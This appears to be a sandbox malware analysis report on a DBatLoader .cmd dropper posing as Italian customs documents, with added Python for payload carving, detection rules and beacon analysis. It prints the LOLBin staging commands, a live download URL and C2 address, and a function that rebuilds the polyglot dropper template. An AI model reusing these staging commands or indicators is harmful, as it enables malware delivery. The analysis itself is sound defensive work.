
Windows Analysis Report
Documentazione_Doganale_richieste_di_copia.cmd

Overview

General Information

Sample name: Documentazione_Doganale_richieste_di_copia.cmd
Analysis ID: 1562927
MD5: e83eaefa47746764ed0708da11cf890f
SHA1: 5986d2e1da1d6fa42825ae627ee688cac4530fd7
SHA256: 13e2c237c2fa5b146ada50ad1be0be71832e42b745f2bc82daa52558807a7aa6
Tags: cmd, doganale, cmd, user-JAMESWT_MHT

Detection

DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Yara detected DBatLoader
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Registers a new ROOT certificate
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7408 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7464 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7488 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 7504 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7524 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7540 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 7568 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7584 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • AnyDesk.PIF (PID: 7640 cmdline: C:\Users\Public\Libraries\AnyDesk.PIF MD5: BCEEA9753420A675AF68CDA43864438E)
    • alpha.exe (PID: 7656 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7672 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
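The process tree above shows the whole staging chain: extrac32 copies cmd.exe to C:\Users\Public\alpha.exe and certutil.exe to C:\Users\Public\kn.exe, then the certutil copy runs twice with -decodehex. The first run reads the .cmd itself with type 9 (CRYPT_STRING_BASE64X509CRLHEADER in wincrypt.h: base64 between "-----BEGIN X509 CRL-----" and "-----END X509 CRL-----" markers, with anything before the header ignored, which is what lets batch commands and payload share one file). The second run reads that output with type 12 (CRYPT_STRING_HEXRAW: bare hex digits, no offsets or ASCII column) and writes AnyDesk.PIF. The script below reproduces those two decode steps offline so the embedded executable can be carved and hashed without executing the sample. It is an added example, not part of the report: the type constants are from wincrypt.h; the batch text and payload are a constructed stand-in, since the report does not show the .cmd contents, and the `%~f0` self-reference is an assumption about how the script names its own path (the tree shows the literal Desktop path); and it assumes the real blob uses exactly those two encodings, which is inferred from the arguments rather than verified here.

```python
"""Offline equivalent of the two `certutil -decodehex` stages in the process
tree, so the embedded PE can be carved without running the sample.
Added example; the input below is a constructed stand-in, not the sample."""
import base64
import binascii
import hashlib
import re

# certutil -decodehex InFile OutFile [type]: the trailing number is a
# CRYPT_STRING_* constant from wincrypt.h. The tree passes 9, then 12.
CRYPT_STRING_BASE64X509CRLHEADER = 9   # base64 between BEGIN/END X509 CRL lines
CRYPT_STRING_HEXRAW = 12               # bare hex digits, no address/ASCII columns

_CRL_BLOCK = re.compile(rb"-----BEGIN X509 CRL-----(.*?)-----END X509 CRL-----", re.S)


def decode_stage(data: bytes, fmt: int) -> bytes:
    """Decode one certutil stage; formats the sample does not use are refused."""
    if fmt == CRYPT_STRING_BASE64X509CRLHEADER:
        m = _CRL_BLOCK.search(data)          # text before the header is skipped
        if not m:
            raise ValueError("no X509 CRL block found")
        return base64.b64decode(re.sub(rb"\s+", b"", m.group(1)), validate=True)
    if fmt == CRYPT_STRING_HEXRAW:
        return binascii.unhexlify(re.sub(rb"\s+", b"", data))
    raise ValueError(f"unsupported CRYPT_STRING type {fmt}")


def carve_payload(cmd_file: bytes) -> dict:
    """Stage 1 yields what the sample calls AnyDesk.jpeg, stage 2 AnyDesk.PIF."""
    stage1 = decode_stage(cmd_file, CRYPT_STRING_BASE64X509CRLHEADER)
    stage2 = decode_stage(stage1, CRYPT_STRING_HEXRAW)
    return {
        "is_pe": stage2[:2] == b"MZ",
        "size": len(stage2),
        "sha256": hashlib.sha256(stage2).hexdigest(),
        "payload": stage2,
    }


# Constructed stand-in payload (just an MZ marker and filler), not the real PE.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"constructed stand-in, not the real DBatLoader PE\x00"


def build_sample_cmd(payload: bytes) -> bytes:
    """Build a polyglot .cmd like the one the tree implies: batch lines that
    mirror the observed commands, `exit /b`, then the base64-wrapped hex blob.
    Constructed; the real file's text is not shown in the report."""
    hex_text = binascii.hexlify(payload)
    hex_lines = b"\r\n".join(hex_text[i:i + 64] for i in range(0, len(hex_text), 64))
    batch = (
        b"@echo off\r\n"
        b"extrac32 /C /Y C:\\Windows\\System32\\cmd.exe \"C:\\Users\\Public\\alpha.exe\"\r\n"
        b"C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe\r\n"
        b"C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F \"%~f0\" \"C:\\Users\\Public\\AnyDesk.jpeg\" 9\r\n"
        b"C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F \"C:\\Users\\Public\\AnyDesk.jpeg\" \"C:\\Users\\Public\\Libraries\\AnyDesk.PIF\" 12\r\n"
        b"exit /b\r\n"   # cmd.exe stops here; the blob below is never run as commands
    )
    return (batch + b"-----BEGIN X509 CRL-----\r\n" + base64.encodebytes(hex_lines)
            + b"-----END X509 CRL-----\r\n")


if __name__ == "__main__":
    result = carve_payload(build_sample_cmd(FAKE_PE))
    print({k: v for k, v in result.items() if k != "payload"})
```

To use it on the real file, pass its bytes to `carve_payload()`; a non-MZ result means the blob is wrapped differently than the arguments suggest and the type constants should be rechecked against the command lines.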
Malware Configuration

DBatLoader: {"Download Url": ["https://vandeytas.ru.com/233_Hlvzmhuinff"]}

Yara Overview

Source | Rule | Description | Author | Strings
00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
9.2.AnyDesk.PIF.2b60000.0.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |

      System Summary

Source: Process started
Author: Florian Roth (Nextron Systems), Tim Shelton
Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7408, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7488, ProcessName: alpha.exe

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 7488, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7504, ProcessName: extrac32.exe

Source: Network Connection
Author: Florian Roth (Nextron Systems), Tim Shelton
Data: DestinationIp: 50.7.187.218, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\AnyDesk.PIF, Initiated: true, ProcessId: 7640, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

Source: Process started
Author: Max Altgelt (Nextron Systems)
Data: Command: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\AnyDesk.PIF, NewProcessName: C:\Users\Public\Libraries\AnyDesk.PIF, OriginalFileName: C:\Users\Public\Libraries\AnyDesk.PIF, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7408, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 7640, ProcessName: AnyDesk.PIF
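Each Sigma hit above fires on one link of the chain. A detection engineer usually wants those links as reusable checks over process-creation telemetry, and this sample sets two traps for naive rules: the copies are renamed, so the system binary has to be matched by hash rather than by name (the tree shows alpha.exe carrying cmd.exe's MD5 8A2122E8162DBEF04694B9C3E0B6CDEE), and the batch file passes paths with doubled backslashes, which Windows accepts but which defeat a literal match on C:\Users\Public\. The following is an added example and not the report's own Sigma logic: it runs four such checks over constructed Sysmon-style events whose images, hashes and command lines are taken from the process tree. Assumptions: certutil's hash is the one shown for kn.exe (extrac32 copies bytes unchanged), the extension list is illustrative, and the field names follow Sysmon event 1 rather than the Joe Sandbox output.

```python
"""Detection checks for the staging chain in the process tree: extrac32
copying cmd.exe/certutil.exe into C:\\Users\\Public under new names, the
certutil copy decoding a payload, and a .PIF launched from Public.
Added example over constructed Sysmon-style events; not the report's rules."""
import ntpath
import re

# MD5s as printed in the report's tree. The certutil value is the one shown
# for kn.exe and is assumed to equal the System32 original (byte copy).
KNOWN_SYSTEM_BINARIES = {
    "8a2122e8162dbef04694b9c3e0b6cdee": "cmd.exe",
    "f17616ec0522fc5633151f7caa278caa": "certutil.exe",
    "41330d97bf17d07cd4308264f3032547": "extrac32.exe",
}
SUSPICIOUS_EXTS = {".pif", ".scr", ".com", ".cpl"}          # illustrative set
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
CERTUTIL_DECODE_VERBS = {"-decodehex", "-decode", "-urlcache"}


def norm(path: str) -> str:
    # The batch passes C:\\Users\\Public (doubled separators) and Windows still
    # resolves it, so collapse runs of backslashes before any prefix match.
    return re.sub(r"\\+", r"\\", path).lower()


def tokens(cmdline: str) -> list:
    """Split a Windows command line into quoted and bare tokens."""
    return [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def in_system_dir(p: str) -> bool:
    return norm(p).startswith("c:\\windows\\")


def user_writable(p: str) -> bool:
    return norm(p).startswith(USER_WRITABLE)


def analyze(ev: dict) -> list:
    findings = []
    image = norm(ev["image"])
    base = ntpath.basename(image)
    expected = KNOWN_SYSTEM_BINARIES.get(ev["md5"].lower())
    toks = tokens(ev["cmdline"])
    low = [norm(t) for t in toks]
    paths = [t for t in toks if ":\\" in norm(t)]
    # 1. A known system binary running under another name or outside C:\Windows
    if expected and (base != expected or not in_system_dir(image)):
        findings.append("renamed_system_binary")
    # 2. extrac32 /C <src> <dst>: a System32 binary copied somewhere user-writable
    if (expected == "extrac32.exe" and "/c" in low and len(paths) >= 2
            and in_system_dir(paths[-2]) and user_writable(paths[-1])):
        findings.append("lolbin_copy_of_system_binary")
    # 3. certutil (by hash, whatever it is called) decoding into a user path
    if expected == "certutil.exe" and CERTUTIL_DECODE_VERBS & set(low):
        if any(user_writable(t) for t in toks):
            findings.append("certutil_decode_to_user_path")
    # 4. Execution from C:\Users\Public with an extension users never launch
    if image.startswith("c:\\users\\public\\") and ntpath.splitext(image)[1] in SUSPICIOUS_EXTS:
        findings.append("suspicious_ext_from_public")
    return findings


# Constructed events mirroring the report's tree; command lines keep the
# doubled backslashes exactly as the report prints them.
EVENTS = [
    dict(pid=7408, image=r"C:\Windows\System32\cmd.exe", md5="8A2122E8162DBEF04694B9C3E0B6CDEE",
         cmdline=r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "'),
    dict(pid=7464, image=r"C:\Windows\System32\extrac32.exe", md5="41330D97BF17D07CD4308264F3032547",
         cmdline=r'C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"'),
    dict(pid=7488, image=r"C:\Users\Public\alpha.exe", md5="8A2122E8162DBEF04694B9C3E0B6CDEE",
         cmdline=r"C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe"),
    dict(pid=7504, image=r"C:\Windows\System32\extrac32.exe", md5="41330D97BF17D07CD4308264F3032547",
         cmdline=r"extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe"),
    dict(pid=7540, image=r"C:\Users\Public\kn.exe", md5="F17616EC0522FC5633151F7CAA278CAA",
         cmdline=r'C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9'),
    dict(pid=7640, image=r"C:\Users\Public\Libraries\AnyDesk.PIF", md5="BCEEA9753420A675AF68CDA43864438E",
         cmdline=r"C:\Users\Public\Libraries\AnyDesk.PIF"),
]


def run_all(events=EVENTS) -> dict:
    return {ev["pid"]: analyze(ev) for ev in events}


if __name__ == "__main__":
    for pid, hits in run_all().items():
        print(pid, hits)
```

The hash lookup is the part worth keeping: a rule keyed on `Image` ending in certutil.exe sees nothing here, while one keyed on the file hash catches kn.exe and alpha.exe regardless of name or location. When the telemetry source does populate OriginalFileName from the PE version resource (Sysmon does; the Joe Sandbox output above filled it with the path), that field is a cheaper second signal.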
Suricata IDS Alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-26T09:38:48.563344+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 50.7.187.218 | 443 | TCP
2024-11-26T09:38:50.754265+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 50.7.187.218 | 443 | TCP
2024-11-26T09:38:52.954772+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 50.7.187.218 | 443 | TCP
2024-11-26T09:38:55.168909+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 50.7.187.218 | 443 | TCP
2024-11-26T09:38:57.281145+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 50.7.187.218 | 443 | TCP
2024-11-26T09:38:59.839817+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:02.030386+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:04.491017+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:06.616914+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49752 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:08.762801+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49755 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:10.894037+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49757 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:12.993224+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49759 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:15.086047+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49761 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:17.307750+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49763 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:19.539915+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49765 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:21.686683+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49767 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:23.870915+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49769 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:26.009878+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49771 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:28.366489+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49773 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:30.558807+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49775 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:32.727424+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49777 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:34.821873+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49779 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:36.950461+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49781 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:39.147343+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49783 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:41.275676+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49785 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:43.417014+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49789 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:45.739224+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49796 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:47.925418+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49803 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:50.066597+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49810 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:52.161402+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49817 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:54.280482+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49824 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:56.417637+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49831 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:58.550142+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49838 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:00.801176+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49845 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:02.950972+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49852 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:05.091745+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49859 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:07.254696+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49866 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:09.425427+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49870 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:11.592526+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49876 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:13.726668+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49881 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:15.936904+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49887 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:18.061957+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49894 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:20.180941+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49900 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:22.438790+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49907 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:24.742215+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49914 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:26.861374+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49921 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:29.007334+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49928 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:31.208417+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49935 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:33.341234+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49942 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:35.405275+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49949 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:37.498236+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49955 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:39.661000+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49962 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:42.015913+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49969 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:44.180953+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49976 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:46.387362+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49983 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:48.493864+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49990 | 50.7.187.218 | 443 | TCP
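Fifty-six alerts in about two minutes, all from 192.168.2.4 to 50.7.187.218:443 (the address the Sigma network event attributes to AnyDesk.PIF) on a fresh source port each time, is the shape of a loader repeatedly opening a short TLS connection to one host; the extracted configuration holds a single Download Url, and this is consistent with polling for that download. An inter-arrival check makes the cadence explicit and is a useful first pass over any flow group in proxy or IDS logs. Added example, not from the report: the first twelve timestamps are copied from the Suricata rows above, the irregular series is constructed for contrast, and the coefficient-of-variation threshold of 0.25 is an assumption to tune per environment.

```python
"""Cadence check for one flow group (src, dst, dport) from IDS alert timestamps.
Added example; REPORT_TIMESTAMPS are copied from the report, the irregular
series is constructed."""
from datetime import datetime
from statistics import mean, pstdev

# Copied from the report: every row is 192.168.2.4 -> 50.7.187.218:443 over TCP.
REPORT_TIMESTAMPS = [
    "2024-11-26T09:38:48.563344+0100",
    "2024-11-26T09:38:50.754265+0100",
    "2024-11-26T09:38:52.954772+0100",
    "2024-11-26T09:38:55.168909+0100",
    "2024-11-26T09:38:57.281145+0100",
    "2024-11-26T09:38:59.839817+0100",
    "2024-11-26T09:39:02.030386+0100",
    "2024-11-26T09:39:04.491017+0100",
    "2024-11-26T09:39:06.616914+0100",
    "2024-11-26T09:39:08.762801+0100",
    "2024-11-26T09:39:10.894037+0100",
    "2024-11-26T09:39:12.993224+0100",
]

# Constructed, not from the report: bursty, human-driven traffic for contrast.
IRREGULAR_TIMESTAMPS = [
    "2024-11-26T09:00:00.000000+0100",
    "2024-11-26T09:00:01.000000+0100",
    "2024-11-26T09:00:31.000000+0100",
    "2024-11-26T09:00:34.000000+0100",
    "2024-11-26T09:02:34.000000+0100",
    "2024-11-26T09:02:41.000000+0100",
]


def parse_ts(s: str) -> datetime:
    # %z accepts the "+0100" offset form used in the report's rows
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%f%z")


def beacon_profile(stamps, max_cv: float = 0.25, min_events: int = 5) -> dict:
    """Inter-arrival statistics for one flow group. The group is flagged as
    periodic when the coefficient of variation (stdev / mean) of the gaps is
    at or below max_cv; both thresholds are assumptions, tune them per site."""
    times = sorted(parse_ts(s) for s in stamps)
    if len(times) < min_events:
        return {"events": len(times), "periodic": False, "reason": "too few events"}
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    m = mean(gaps)
    sd = pstdev(gaps)
    cv = sd / m if m > 0 else float("inf")
    return {
        "events": len(times),
        "span_s": round((times[-1] - times[0]).total_seconds(), 3),
        "mean_s": round(m, 3),
        "stdev_s": round(sd, 3),
        "cv": round(cv, 3),
        "periodic": cv <= max_cv,
    }


if __name__ == "__main__":
    print("report:   ", beacon_profile(REPORT_TIMESTAMPS))
    print("irregular:", beacon_profile(IRREGULAR_TIMESTAMPS))
```

On the report's rows the mean gap is about 2.2 s with a coefficient of variation near 0.06; the constructed series scores above 1. A sleep-with-jitter implant raises the CV, so in production this check is a triage aid on top of destination reputation, not a standalone verdict.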


      AV Detection

Source: 9.0.AnyDesk.PIF.400000.0.unpack | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://vandeytas.ru.com/233_Hlvzmhuinff"]}
Source: C:\Users\Public\Libraries\AnyDesk.PIF | ReversingLabs: Detection: 68%
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4C2F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF67C4C2F38
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4C2C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,6_2_00007FF67C4C2C2C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C50DD80 CertFindExtension,CryptDecodeObject,6_2_00007FF67C50DD80
